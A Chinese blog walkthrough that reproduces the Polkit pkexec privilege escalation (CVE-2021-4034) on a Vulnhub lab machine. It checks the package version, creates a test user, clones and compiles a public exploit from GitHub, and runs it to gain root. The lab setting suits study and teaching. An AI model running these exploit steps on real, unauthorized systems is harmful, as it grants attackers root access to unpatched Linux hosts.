热门标签
热门文章
- 1三分钟实现 Spring Boot 集成 RabbitMQ,实现消息队列服务_rabbitmq springboot starter
- 2中间件漏洞详解(iss、apache、nginx、tomcat、weblogic、jboss)_中间件apache tomcat
- 3OSPF定义的5种区域类型:标准区域、主干区域、存根区域、完全存根区域_ospf的区域有几种类型,分别是什么?
- 42万字系统总结,带你实现 Linux 命令自由?还不赶紧进来学习_将linux系统备份到仓库
- 5程序员必备的5款提升效率的实用AI代码工具_代码ai
- 6ROS socketcan_bridge使用说明_ros java socketcan
- 7JSON.toJSONString()空字段不忽略修改_json.tojsonstring空字段
- 8如何正确管理自己的第一台电脑?老鸟如何追求快捷操作电脑?
- 9Android 多媒体开发——Media3与MediaSession最全使用指南
- 10Win11 电脑连接蓝牙耳机成功但输出设备找不到_win11蓝牙耳机连接后不显示输出设备
当前位置: article > 正文
Polkit(CVE-2021-4034复现)提权_polkit提权
作者:IT小白 | 2024-08-19 01:36:19
赞
踩
polkit提权
漏洞影响2009年5月至今的所有polkit版本
此工具是linux系统预装工具,所有存在此工具的linux系统都会收到影响
判断是否有这个漏洞:
- dpkg -l policykit-1 #debain,ubuntu
- rpm -qai policykit-1 #centos,redhat
本次环境是vulnhub的lampiao(脏牛)靶机
复现:
新建用户:
- useradd -d /home/test -m test #新建用户
- passwd test #改密码
- su test #切换用户
- cd /tmp #进入tmp目录
下载exp(exp下载到了tmp目录下):
- git clone https://github.com/berdav/CVE-2021-4034.git #不能下载时,就自己复制链接下载,在传到目标靶机
- cd CVE-2021-4034/
- make #编译
- ./cve-2021-4034 #运行
成功提权:
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/1000172
推荐阅读
相关标签
